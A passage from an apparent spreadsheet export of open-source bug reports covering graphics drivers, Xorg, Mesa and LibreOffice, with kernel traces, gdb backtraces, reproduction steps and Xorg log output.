 [933.285478] hardirqs last disabled at (52645): [] __slab_free+0x139/0x4f0
 [933.285520] softirqs last  enabled at (52060): [] __i915_request_commit+0x284/0x6c0 [i915]
 [933.285527] softirqs last disabled at (52373): [] irq_exit+0xa9/0xc0
 [933.285531] 
other info that might help us debug this:
 [933.285534]  Possible unsafe locking scenario:
 [933.285538]        CPU0
 [933.285540]        ----
 [933.285542]   lock(
 [933.285545]   
 [933.285547]     lock(
 [933.285550] 
 *** DEADLOCK ***
 [933.285554] 1 lock held by gem_ctx_engines/3260:
 [933.285557]  #0: 000000007c81970c (rcu_callback){....} at: rcu_core+0x472/0x720
 [933.285565] 
stack backtrace:
 [933.285569] CPU: 5 PID: 3260 Comm: gem_ctx_engines Tainted: G     U            5.2.0-rc3-CI-CI_DRM_6208+ #1
 [933.285574] Hardware name: Dell Inc. XPS 8300  /0Y2MRG BIOS A06 10/17/2011
 [933.285577] Call Trace:
 [933.285580]  
 [933.285584]  dump_stack+0x67/0x9b
 [933.285588]  mark_lock+0x5c4/0x660
 [933.285592]  ? check_usage_backwards+0x150/0x150
 [933.285596]  __lock_acquire+0x6c1/0x24c0
 [933.285599]  ? _raw_spin_unlock_irqrestore+0x4c/0x60
 [933.285603]  ? lockdep_hardirqs_on+0xe3/0x1b0
 [933.285641]  ? i915_gem_free_object+0xb4/0x1d0 [i915]
 [933.285677]  ? __free_engines+0x39/0x50 [i915]
 [933.285681]  ? __slab_free+0x3e8/0x4f0
 [933.285684]  ? __slab_free+0x3e8/0x4f0
 [933.285688]  ? lockdep_hardirqs_on+0xe3/0x1b0
 [933.285692]  ? lock_acquire+0xa6/0x1c0
 [933.285695]  lock_acquire+0xa6/0x1c0
 [933.285732]  ? i915_gem_free_object+0xb4/0x1d0 [i915]
 [933.285736]  ? rcu_core+0x472/0x720
 [933.285739]  _raw_spin_lock+0x2a/0x40
 [933.285775]  ? i915_gem_free_object+0xb4/0x1d0 [i915]
 [933.285812]  i915_gem_free_object+0xb4/0x1d0 [i915]
 [933.285848]  ? __free_engines+0x50/0x50 [i915]
 [933.285852]  ? rcu_core+0x472/0x720
 [933.285886]  ring_context_destroy+0x42/0xe0 [i915]
 [933.285921]  __free_engines+0x39/0x50 [i915]
 [933.285925]  rcu_core+0x417/0x720
 [933.285929]  __do_softirq+0xd8/0x4b9
 [933.285934]  irq_exit+0xa9/0xc0
 [933.285937]  smp_apic_timer_interrupt+0x9c/0x250
 [933.285941]  apic_timer_interrupt+0xf/0x20
 [933.285944]  
 [933.285948] RIP: 0010:__slab_alloc.isra.28.constprop.34+0x4f/0x70
 [933.285952] Code: 89 f2 44 89 ee 48 8b 0c c5 a0 65 15 82 4c 89 e7 48 01 d9 e8 43 fc ff ff f7 c5 00 02 00 00 48 89 c3 74 13 e8 23 3f f6 ff 55 9d  89 d8 5b 5d 41 5c 41 5d 41 5e c3 55 9d e8 0e 41 f6 ff 48 89 d8
 [933.285961] RSP: 0018:ffffc900004c7c60 EFLAGS: 00000246 ORIG_RAX: ffffffffffffff13
 [933.285966] RAX: ffff888214558040 RBX: ffff88821d4e2108 RCX: 0000000000000005
 [933.285969] RDX: 0000000000000046 RSI: 0000000000000006 RDI: ffffffff8212df49
 [933.285973] RBP: 0000000000000246 R08: 0000000000000001 R09: 0000000000000000
 [933.285977] R10: 0000000000000000 R11: 0000000000000000 R12: ffff888226808d40
 [933.285981] R13: 0000000000002cc0 R14: ffffffffa01c11a4 R15: ffffffffa01c11a4
 [933.286016]  ? i915_gem_execbuffer2_ioctl+0xc4/0x430 [i915]
 [933.286051]  ? i915_gem_execbuffer2_ioctl+0xc4/0x430 [i915]
 [933.286057]  __kmalloc+0x29f/0x2e0
 [933.286092]  ? i915_gem_execbuffer_ioctl+0x300/0x300 [i915]
 [933.286127]  i915_gem_execbuffer2_ioctl+0xc4/0x430 [i915]
 [933.286162]  ? i915_gem_execbuffer_ioctl+0x300/0x300 [i915]
 [933.286167]  drm_ioctl_kernel+0x83/0xf0
 [933.286171]  drm_ioctl+0x2f3/0x3b0
 [933.286205]  ? i915_gem_execbuffer_ioctl+0x300/0x300 [i915]
 [933.286211]  ? __handle_mm_fault+0x97c/0xfc0
 [933.286216]  do_vfs_ioctl+0xa0/0x6e0
 [933.286219]  ? lock_acquire+0xa6/0x1c0
 [933.286223]  ? __task_pid_nr_ns+0xb9/0x1f0
 [933.286227]  ksys_ioctl+0x35/0x60
 [933.286230]  __x64_sys_ioctl+0x11/0x20
 [933.286234]  do_syscall_64+0x55/0x1c0
 [933.286237]  entry_SYSCALL_64_after_hwframe+0x49/0xbe
 [933.286241] RIP: 0033:0x7f94f64c35d7
 [933.286244] Code: b3 66 90 48 8b 05 b1 48 2d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05  3d 01 f0 ff ff 73 01 c3 48 8b 0d 81 48 2d 00 f7 d8 64 89 01 48
 [933.286252] RSP: 002b:00007ffcc7fead28 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
 [933.286257] RAX: ffffffffffffffda RBX: 00000000ffffffea RCX: 00007f94f64c35d7
 [933.286261] RDX: 00007ffcc7feae40 RSI: 0000000040406469 RDI: 0000000000000005
 [933.286265] RBP: 00007ffcc7feae40 R08: 0000000000000000 R09: 000000000000001e
 [933.286268] R10: 00000000ffffffe2 R11: 0000000000000246 R12: 0000000040406469
 [933.286272] R13: 0000000000000005 R14: 0000000000000005 R15: 00007ffcc7feae40
 [933.450016] [IGT] gem_ctx_engines: exiting ret=0
 [933.450221] Setting dangerous option reset - tainting kernel
 [933.484950] Console: switching to colour frame buffer device 128x48</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-14225</t>
  </si>
  <si>
    <t>Patch for adding group switch key to Ethiopic keyboard</t>
  </si>
  <si>
    <t>Created attachment 13897
Patch
Patch for adding group switch key to Ethiopic keyboard</t>
  </si>
  <si>
    <t>LIBREOFFICE-34831</t>
  </si>
  <si>
    <t>EDITING: Calc crashes after hitting Ctrl + Shift + Left Arrowkey to the right of a hidden column</t>
  </si>
  <si>
    <t>Crash in LibreOffice 3.3.0 release and LibreOffice 3.3.1 release
Installed Libre Office from:
http://download.opensuse.org/repositories/LibreOffice:/Stable/openSUSE_11.2/x86_64/
How to reproduce:
-Open Calc
-Hide column C
-Select cell A1
-Select A1:D1 using 3 * Shift + Right Arrow Key
-Press Ctrl + Shift and Left Arrow Key
Expected behaviour: Calc deselects B1:D1
Actual Behavior   : Calc crashes
BTW: Problem not observed in Open Office 3.3.0 on Windows (32-bits)
Open Office 3.2.1 on SLES-11-SP1 (32 bits)
Happy bug hunting!
Stephan van den Akker</t>
  </si>
  <si>
    <t>XORG-10504</t>
  </si>
  <si>
    <t>xrandr show that VGA is always on with intel 1.9.93</t>
  </si>
  <si>
    <t>Subsequent starts of xrandr show that VGA is connected although it isn't.
The laptop is a Toshiba L10-204 with an i855GM chipset.</t>
  </si>
  <si>
    <t>deejay1</t>
  </si>
  <si>
    <t>XORG-13222</t>
  </si>
  <si>
    <t>xserver-1.4 crash when using a USB keyboard with evdev</t>
  </si>
  <si>
    <t>I have a crash when using evdev on Linux and two keyboards. Tested with xserver-1.4 + fixes found on git branch origin/server-1.4-branch (as of today).
To reproduce just play around with two keyboards (in my setup one PS2 and other USB I don't have two USBs to test). It doesn't happen if the evdev driver is not installed.
Here is what I get:
1. When I connect the second keyboard (a USB one) X sometimes crashes and sometimes generates spurious mouse events (middle button click mouse-move)
2. If the xserver survives when I remove the USB keyboard it crashes imediately.
3. It doesn't start with the two keyboards connected (SIGSEGV)
Below is the output from the server when in debug mode plus a backtrace of the crash when starting it. I'll also attach the Xorg.0.log file.
FlushingSerial
[config/hal] getting input.x11_driver on /org/freedesktop/Hal/devices/usb_device_518_2_noserial_if0_logica
ldev_input returned evdev
 [config/hal] getting input.device on /org/freedesktop/Hal/devices/usb_device_518_2_noserial_if0_logicaldev _input returned /dev/input/event10
 [config/hal] getting info.product on /org/freedesktop/Hal/devices/usb_device_518_2_noserial_if0_logicaldev _input returned USB-compliant keyboard
 [config/hal] getting input.xkb.rules on /org/freedesktop/Hal/devices/usb_device_518_2_noserial_if0_logicaldev_input returned base
 [config/hal] getting input.xkb.model on /org/freedesktop/Hal/devices/usb_device_518_2_noserial_if0_logical            dev_input returned evdev
 [config/hal] getting input.xkb.layout on /org/freedesktop/Hal/devices/usb_device_518_2_noserial_if0_logicaldev_input returned us
 [config/hal] getting input.xkb.variant on /org/freedesktop/Hal/devices/usb_device_518_2_noserial_if0_logicaldev_input returned
(EE) USB-compliant keyboard-usb-0000:00:1d.1-2/input1: AbsoluteTouch: 'DIGI_Touch' does not exist.
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread -1212393792 (LWP 23015)]
EvdevProc (device=0x0 what=2) at evdev.c:142
142         InputInfoPtr pInfo = device-&gt;public.devicePrivate
(gdb) bt
#0  EvdevProc (device=0x0 what=2) at evdev.c:142
#1  0xb69dd27c in evdevRescanDevices (pInfo=) at evdev_brain.c:302
#2  0xb69dd98b in evdevNewDriver (driver=0x84509f0) at evdev_brain.c:460
#3  0xb69dc4d8 in EvdevCorePreInit (drv=0x844bc28 dev=0x8450918 flags=0) at evdev.c:449
#4  0x08101436 in NewInputDeviceRequest (options=0x8449930 pdev=0xbff3994c) at xf86Xinput.c:398
#5  0x080b6196 in device_added (hal_ctx=0x844ad70
    udi=0x8449748 /org/freedesktop/Hal/devices/usb_device_518_2_noserial_if0_logicaldev_input)
    at hal.c:232
#6  0x080b644d in connect_hook (connection=0x8449418 data=0x824dd40) at hal.c:323
#7  0x080b58c5 in connect_to_bus () at dbus-core.c:169
#8  0x080b5920 in reconnect_timer (timer=0x8272008 time=4568956 arg=0x0) at dbus-core.c:188
#9  0x08212368 in DoTimer (timer=0x8272008 now=4568956 prev=0x826e284) at WaitFor.c:459
#10 0x08211d21 in WaitForSomething (pClientsReady=0xbff39d30) at WaitFor.c:293
#11 0x08085ff1 in Dispatch () at dispatch.c:425
#12 0x0806ed24 in main (argc=1 argv=0xbff3a264 envp=0xbff3a26c) at main.c:452
(gdb)</t>
  </si>
  <si>
    <t>ademar</t>
  </si>
  <si>
    <t>MESA-87657</t>
  </si>
  <si>
    <t>dri_interface.h:51:17: error: drm.h: No such file or directory</t>
  </si>
  <si>
    <t>mesa: 402c80837258d0fd2eb5c25f2b2096ae692cda48 (master 10.5.0-devel)
Build error on Ubuntu 10.04.
$ scons llvm=0
[...]
  Compiling src/egl/drivers/dri2/egl_dri2.c ...
In file included from src/egl/drivers/dri2/egl_dri2.c:43:
include/GL/internal/dri_interface.h:51:17: error: drm.h: No such file or directory
400b833592d9aad7b2c4627a897380642d52189f is the first bad commit
commit 400b833592d9aad7b2c4627a897380642d52189f
Author: Alexander von Gluck IV 
Date:   Mon Dec 22 10:10:13 2014 -0500
    egl: Add Haiku code and support
    * This is the cleaned up work of the Haiku GCI student
      AdriÃ¡n Arroyo Calle adrian.arroyocalle@gmail.com
    * Several patches were consolidated to prevent
      unnecessary touching of non-related code
:040000 040000 9671e824b72a606d39d6531ae4bc70af7fb54839 09260382434931b1e02e554dbd4f0bc195458170 M	include
:040000 040000 ca81602bbc8b7cbf231eead74f769d001ba9446c 019fd0d0af7bf6df97ed3111d886545fe40c0895 M	src
bisect run success</t>
  </si>
  <si>
    <t>LIBREOFFICE-56669</t>
  </si>
  <si>
    <t>GERRIT sends mail with invalid sender error in DNS MX</t>
  </si>
  <si>
    <t>Was wondering why I don't get any mail from gerrit...
From my mail logs:
mainlog:2012-11-02 10:54:28 H=vm2.documentfoundation.org [78.46.154.99] sender verify fail for 
: all relevant MX records point to non-existent hosts
mainlog:2012-11-02 10:54:28 H=vm2.documentfoundation.org [78.46.154.99] F= rejected RCPT : Sender verify failed
Indeed:
$ dig -t MX +short gerrit.libreoffice.org
10 vm2.libreoffice.org.
$ host vm2.libreoffice.org
Host vm2.libreoffice.org not found: 3(NXDOMAIN)
You probably meant vm2.documentfoundation.org:
$ host vm2.documentfoundation.org
vm2.documentfoundation.org has address 78.46.154.99
vm2.documentfoundation.org mail is handled by 10 vm2.documentfoundation.org.</t>
  </si>
  <si>
    <t>XORG-32066</t>
  </si>
  <si>
    <t>Resume takes 15 seconds due to *ERROR* atombios stuck in loop for more than 5secs aborting</t>
  </si>
  <si>
    <t>Created attachment 40753
ATOM BIOS
During resume I get:
[18832.030013] [drm:atom_op_jump] *ERROR* atombios stuck in loop for more than 5secs aborting
[18832.030016] [drm:atom_execute_table_locked] *ERROR* atombios stuck executing E8B8 (len 86 WS 4 PS 0) @ 0xE8EB
[18837.060015] [drm:atom_op_jump] *ERROR* atombios stuck in loop for more than 5secs aborting
[18837.060019] [drm:atom_execute_table_locked] *ERROR* atombios stuck executing E8B8 (len 86 WS 4 PS 0) @ 0xE8EB
[18842.380012] [drm:atom_op_jump] *ERROR* atombios stuck in loop for more than 5secs aborting
[18842.380016] [drm:atom_execute_table_locked] *ERROR* atombios stuck executing E8B8 (len 86 WS 4 PS 0) @ 0xE8EB
[18842.430097] PM: resume of drv:radeon dev:0000:01:00.0 complete after 15575.937 msecs
I have a:
(--) RADEON(0): Chipset: ATI Mobility Radeon X1600 (ChipID = 0x71c5)</t>
  </si>
  <si>
    <t>Russ.Dill</t>
  </si>
  <si>
    <t>DRI-47135</t>
  </si>
  <si>
    <t>Switching mplayer between fullscreen/windowed leaves video traces on screeen</t>
  </si>
  <si>
    <t>LIBREOFFICE-56725</t>
  </si>
  <si>
    <t>ActionTriggerContainer.createInstance (com.sun.star.ui.ActionTrigger) creates an actionTrigger with no PropertySet interfaces</t>
  </si>
  <si>
    <t>ActionTriggerContainer.createInstance (com.sun.star.ui.ActionTrigger) creates an ActionTrigger with no methods to change the property values.
DBG_Properties returns the following:
SbxOBJECT SourceWindow
SbxOBJECT ExecutePosition
SbxOBJECT ActionTriggerContainer
SbxOBJECT Selection
SbxSTRING Dbg_SupportedInterfaces
SbxSTRING Dbg_Properties
SbxSTRING Dbg_Methods
DBG_Methods returns the following:
No methods found
DBG_SupportedInterfaces returns the following:
No methods found
Following code will crash:
Function MenuOverride_notifyContextMenuExecute(oActionTrigger)	
	dim oNewMenuItem
	oNewMenuItem = oActionTrigger.ActionTriggerContainer.createInstance (com.sun.star.ui.ActionTrigger)
        'No property set methods available following code will crash
	oNewMenuItem.setPropertyValue(Text New Menu Item)
	oNewMenuItem.setPropertyValue(CommandURL macro:///SomeMacro)
	oActionTrigger.ActionTriggerContainer.insertByIndex (0 oNewMenuItem)
	MenuOverride_notifyContextMenuExecute = com.sun.star.ui.ContextMenuInterceptorAction.EXECUTE_MODIFIED
End	Function</t>
  </si>
  <si>
    <t>ahzeeman</t>
  </si>
  <si>
    <t>DRI-92996</t>
  </si>
  <si>
    <t>[Fiji/amdgpu/Powerplay] Problems with interactivity performance EQ overflow with Powerplay</t>
  </si>
  <si>
    <t>Not sure if all these problems are related or not I think they are.
This happens when I test Powerplay with my Fiji.
When I start the Steam client the mouse cursor freezes a number of times for a short duration. Also interactivity during 3D graphics is bad.
Hardware:
Radeon Fury
Intel 2500k
Software:
64-bit Ubuntu 15.10
LLVM 3.8~svn252698-0~padoka0
Mesa 11.1~git151118010100.dd05ffe~padoka0
Linux agd5f/powerplay from 151117
Xorg 2:1.17.2-1ubuntu9
xorg-video-amdgpu 0.0.01+git1511040732.92e7c9~gd~w
libdrm-amdgpu 2.4.65+git1511161830.8913cd~gd~w
Dmesg says:
[  1023.552] (WW) AMDGPU(0): amdgpu_dri2_flip_event_handler: Pageflip completion event has impossible msc 117453646 &lt; target_msc 117453647
[  1024.469] (WW) AMDGPU(0): amdgpu_dri2_flip_event_handler: Pageflip completion event has impossible msc 117453701 &lt; target_msc 117453702
[  1025.335] (WW) AMDGPU(0): amdgpu_dri2_flip_event_handler: Pageflip completion event has impossible msc 117453753 &lt; target_msc 117453754
[  1030.502] (WW) AMDGPU(0): amdgpu_dri2_flip_event_handler: Pageflip completion event has impossible msc 117454063 &lt; target_msc 117454064
[  1137.140] (WW) AMDGPU(0): amdgpu_dri2_flip_event_handler: Pageflip completion event has impossible msc 117460461 &lt; target_msc 117460462
[  1142.207] (WW) AMDGPU(0): amdgpu_dri2_flip_event_handler: Pageflip completion event has impossible msc 117460765 &lt; target_msc 117460766
[  1148.591] (WW) AMDGPU(0): amdgpu_dri2_flip_event_handler: Pageflip completion event has impossible msc 117461148 &lt; target_msc 117461149
[  1153.958] (WW) AMDGPU(0): amdgpu_dri2_flip_event_handler: Pageflip completion event has impossible msc 117461470 &lt; target_msc 117461471
[  1160.191] (WW) AMDGPU(0): amdgpu_dri2_flip_event_handler: Pageflip completion event has impossible msc 117461844 &lt; target_msc 117461845
[  1163.942] (WW) AMDGPU(0): amdgpu_dri2_flip_event_handler: Pageflip completion event has impossible msc 117462069 &lt; target_msc 117462070
[  1256.362] (WW) AMDGPU(0): amdgpu_dri2_flip_event_handler: Pageflip completion event has impossible msc 117467614 &lt; target_msc 117467615
[  2637.722] (WW) AMDGPU(0): amdgpu_dri2_flip_event_handler: Pageflip completion event has impossible msc 117550492 &lt; target_msc 117550493
[  2691.391] (WW) AMDGPU(0): amdgpu_dri2_flip_event_handler: Pageflip completion event has impossible msc 117553712 &lt; target_msc 117553713
[  2700.275] (WW) AMDGPU(0): amdgpu_dri2_flip_event_handler: Pageflip completion event has impossible msc 117554245 &lt; target_msc 117554246
[  2705.059] (WW) AMDGPU(0): amdgpu_dri2_flip_event_handler: Pageflip completion event has impossible msc 117554532 &lt; target_msc 117554533
[  2751.244] (WW) AMDGPU(0): amdgpu_dri2_flip_event_handler: Pageflip completion event has impossible msc 117557303 &lt; target_msc 117557304
[  2758.727] (WW) AMDGPU(0): amdgpu_dri2_flip_event_handler: Pageflip completion event has impossible msc 117557752 &lt; target_msc 117557753
Xorg.0.log says:
(EE) [mi] EQ overflowing.  Additional events will be discarded until existing events are processed.
(EE) 
(EE) Backtrace:
(EE) 0: /usr/bin/X (xorg_backtrace+0x4e) [0x5634060bf62e]
(EE) 1: /usr/bin/X (mieqEnqueue+0x253) [0x5634060a1313]
(EE) 2: /usr/bin/X (QueuePointerEvents+0x52) [0x563405f7b152]
(EE) 3: /usr/lib/xorg/modules/input/evdev_drv.so (0x7f96e7dc5000+0x60a7) [0x7f96e7dcb0a7]
(EE) 4: /usr/lib/xorg/modules/input/evdev_drv.so (0x7f96e7dc5000+0x687d) [0x7f96e7dcb87d]
(EE) 5: /usr/bin/X (0x563405f0b000+0x96ac8) [0x563405fa1ac8]
(EE) 6: /usr/bin/X (0x563405f0b000+0xbfc52) [0x563405fcac52]
(EE) 7: /lib/x86_64-linux-gnu/libc.so.6 (0x7f96f3ef2000+0x352f0) [0x7f96f3f272f0]
(EE) 8: /usr/bin/X (0x563405f0b000+0x1b8df0) [0x5634060c3df0]
(EE) 9: /lib/x86_64-linux-gnu/libc.so.6 (0x7f96f3ef2000+0x352f0) [0x7f96f3f272f0]
(EE) 10: /lib/x86_64-linux-gnu/libc.so.6 (ioctl+0x7) [0x7f96f3fef0b7]
(EE) 11: /usr/lib/x86_64-linux-gnu/libdrm.so.2 (drmIoctl+0x28) [0x7f96f52d7138]
(EE) 12: /usr/lib/x86_64-linux-gnu/libdrm.so.2 (drmCommandWriteRead+0x1f) [0x7f96f52d9e2f]
(EE) 13: /usr/lib/x86_64-linux-gnu/libdrm_amdgpu.so.1 (0x7f96f0230000+0x2b4f) [0x7f96f0232b4f]
(EE) 14: /usr/lib/x86_64-linux-gnu/libdrm_amdgpu.so.1 (amdgpu_cs_submit+0x44) [0x7f96f0232f24]
(EE) 15: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x73f54a) [0x7f96ef3d654a]
(EE) 16: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x689a97) [0x7f96ef320a97]
(EE) 17: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x746477) [0x7f96ef3dd477]
(EE) 18: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x6838ad) [0x7f96ef31a8ad]
(EE) 19: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x748bd7) [0x7f96ef3dfbd7]
(EE) 20: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x24413a) [0x7f96eeedb13a]
(EE) 21: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x1a8f23) [0x7f96eee3ff23]
(EE) 22: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x2066ac) [0x7f96eee9d6ac]
(EE) 23: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x199e36) [0x7f96eee30e36]
(EE) 24: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x19a04b) [0x7f96eee3104b]
(EE) 25: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x19a445) [0x7f96eee31445]
(EE) 26: /usr/lib/xorg/modules/libglamoregl.so (0x7f96eac92000+0xdf1f) [0x7f96eac9ff1f]
(EE) 27: /usr/lib/xorg/modules/libglamoregl.so (0x7f96eac92000+0x1fbb0) [0x7f96eacb1bb0]
(EE) 28: /usr/lib/xorg/modules/libglamoregl.so (0x7f96eac92000+0x2076d) [0x7f96eacb276d]
(EE) 29: /usr/bin/X (0x563405f0b000+0x13d91b) [0x56340604891b]
(EE) 30: /usr/bin/X (doPolyText+0x198) [0x563405f65a28]
(EE) 31: /usr/bin/X (PolyText+0x59) [0x563405f66769]
(EE) 32: /usr/bin/X (0x563405f0b000+0x55499) [0x563405f60499]
(EE) 33: /usr/bin/X (0x563405f0b000+0x5818f) [0x563405f6318f]
(EE) 34: /usr/bin/X (0x563405f0b000+0x5c34b) [0x563405f6734b]
(EE) 35: /lib/x86_64-linux-gnu/libc.so.6 (__libc_start_main+0xf0) [0x7f96f3f12a40]
(EE) 36: /usr/bin/X (_start+0x29) [0x563405f516c9]
(EE) 
(EE) [mi] These backtraces from mieqEnqueue may point to a culprit higher up the stack.
(EE) [mi] mieq is *NOT* the cause.  It is a victim.
(EE) [mi] EQ overflow continuing.  100 events have been dropped.
(EE) 
(EE) Backtrace:
(EE) 0: /usr/bin/X (xorg_backtrace+0x4e) [0x5634060bf62e]
(EE) 1: /usr/bin/X (QueuePointerEvents+0x52) [0x563405f7b152]
(EE) 2: /usr/lib/xorg/modules/input/evdev_drv.so (0x7f96e7dc5000+0x60a7) [0x7f96e7dcb0a7]
(EE) 3: /usr/lib/xorg/modules/input/evdev_drv.so (0x7f96e7dc5000+0x687d) [0x7f96e7dcb87d]
(EE) 4: /usr/bin/X (0x563405f0b000+0x96ac8) [0x563405fa1ac8]
(EE) 5: /usr/bin/X (0x563405f0b000+0xbfc52) [0x563405fcac52]
(EE) 6: /lib/x86_64-linux-gnu/libc.so.6 (0x7f96f3ef2000+0x352f0) [0x7f96f3f272f0]
(EE) 7: /usr/bin/X (0x563405f0b000+0x1b8df0) [0x5634060c3df0]
(EE) 8: /lib/x86_64-linux-gnu/libc.so.6 (0x7f96f3ef2000+0x352f0) [0x7f96f3f272f0]
(EE) 9: /lib/x86_64-linux-gnu/libc.so.6 (ioctl+0x7) [0x7f96f3fef0b7]
(EE) 10: /usr/lib/x86_64-linux-gnu/libdrm.so.2 (drmIoctl+0x28) [0x7f96f52d7138]
(EE) 11: /usr/lib/x86_64-linux-gnu/libdrm.so.2 (drmCommandWriteRead+0x1f) [0x7f96f52d9e2f]
(EE) 12: /usr/lib/x86_64-linux-gnu/libdrm_amdgpu.so.1 (0x7f96f0230000+0x2b4f) [0x7f96f0232b4f]
(EE) 13: /usr/lib/x86_64-linux-gnu/libdrm_amdgpu.so.1 (amdgpu_cs_submit+0x44) [0x7f96f0232f24]
(EE) 14: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x73f54a) [0x7f96ef3d654a]
(EE) 15: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x689a97) [0x7f96ef320a97]
(EE) 16: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x746477) [0x7f96ef3dd477]
(EE) 17: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x6838ad) [0x7f96ef31a8ad]
(EE) 18: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x748bd7) [0x7f96ef3dfbd7]
(EE) 19: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x24413a) [0x7f96eeedb13a]
(EE) 20: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x1a8f23) [0x7f96eee3ff23]
(EE) 21: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x2066ac) [0x7f96eee9d6ac]
(EE) 22: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x199e36) [0x7f96eee30e36]
(EE) 23: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x19a04b) [0x7f96eee3104b]
(EE) 24: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x19a445) [0x7f96eee31445]
(EE) 25: /usr/lib/xorg/modules/libglamoregl.so (0x7f96eac92000+0xdf1f) [0x7f96eac9ff1f]
(EE) 26: /usr/lib/xorg/modules/libglamoregl.so (0x7f96eac92000+0x1fbb0) [0x7f96eacb1bb0]
(EE) 27: /usr/lib/xorg/modules/libglamoregl.so (0x7f96eac92000+0x2076d) [0x7f96eacb276d]
(EE) 28: /usr/bin/X (0x563405f0b000+0x13d91b) [0x56340604891b]
(EE) 29: /usr/bin/X (doPolyText+0x198) [0x563405f65a28]
(EE) 30: /usr/bin/X (PolyText+0x59) [0x563405f66769]
(EE) 31: /usr/bin/X (0x563405f0b000+0x55499) [0x563405f60499]
(EE) 32: /usr/bin/X (0x563405f0b000+0x5818f) [0x563405f6318f]
(EE) 33: /usr/bin/X (0x563405f0b000+0x5c34b) [0x563405f6734b]
(EE) 34: /lib/x86_64-linux-gnu/libc.so.6 (__libc_start_main+0xf0) [0x7f96f3f12a40]
(EE) 35: /usr/bin/X (_start+0x29) [0x563405f516c9]
(EE) 
(EE) [mi] EQ overflow continuing.  200 events have been dropped.
(EE) 
(EE) Backtrace:
(EE) 0: /usr/bin/X (xorg_backtrace+0x4e) [0x5634060bf62e]
(EE) 1: /usr/bin/X (QueuePointerEvents+0x52) [0x563405f7b152]
(EE) 2: /usr/lib/xorg/modules/input/evdev_drv.so (0x7f96e7dc5000+0x60a7) [0x7f96e7dcb0a7]
(EE) 3: /usr/lib/xorg/modules/input/evdev_drv.so (0x7f96e7dc5000+0x687d) [0x7f96e7dcb87d]
(EE) 4: /usr/bin/X (0x563405f0b000+0x96ac8) [0x563405fa1ac8]
(EE) 5: /usr/bin/X (0x563405f0b000+0xbfc52) [0x563405fcac52]
(EE) 6: /lib/x86_64-linux-gnu/libc.so.6 (0x7f96f3ef2000+0x352f0) [0x7f96f3f272f0]
(EE) 7: /usr/bin/X (0x563405f0b000+0x1b8df0) [0x5634060c3df0]
(EE) 8: /lib/x86_64-linux-gnu/libc.so.6 (0x7f96f3ef2000+0x352f0) [0x7f96f3f272f0]
(EE) 9: /lib/x86_64-linux-gnu/libc.so.6 (ioctl+0x7) [0x7f96f3fef0b7]
(EE) 10: /usr/lib/x86_64-linux-gnu/libdrm.so.2 (drmIoctl+0x28) [0x7f96f52d7138]
(EE) 11: /usr/lib/x86_64-linux-gnu/libdrm.so.2 (drmCommandWriteRead+0x1f) [0x7f96f52d9e2f]
(EE) 12: /usr/lib/x86_64-linux-gnu/libdrm_amdgpu.so.1 (0x7f96f0230000+0x2b4f) [0x7f96f0232b4f]
(EE) 13: /usr/lib/x86_64-linux-gnu/libdrm_amdgpu.so.1 (amdgpu_cs_submit+0x44) [0x7f96f0232f24]
(EE) 14: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x73f54a) [0x7f96ef3d654a]
(EE) 15: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x689a97) [0x7f96ef320a97]
(EE) 16: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x746477) [0x7f96ef3dd477]
(EE) 17: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x6838ad) [0x7f96ef31a8ad]
(EE) 18: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x748bd7) [0x7f96ef3dfbd7]
(EE) 19: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x24413a) [0x7f96eeedb13a]
(EE) 20: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x1a8f23) [0x7f96eee3ff23]
(EE) 21: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x2066ac) [0x7f96eee9d6ac]
(EE) 22: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x199e36) [0x7f96eee30e36]
(EE) 23: /usr/lib/x86_64-linux-gnu/dri/radeonsi_dri.so (0x7f96eec97000+0x19a04b) [0x7f96eee3104b]
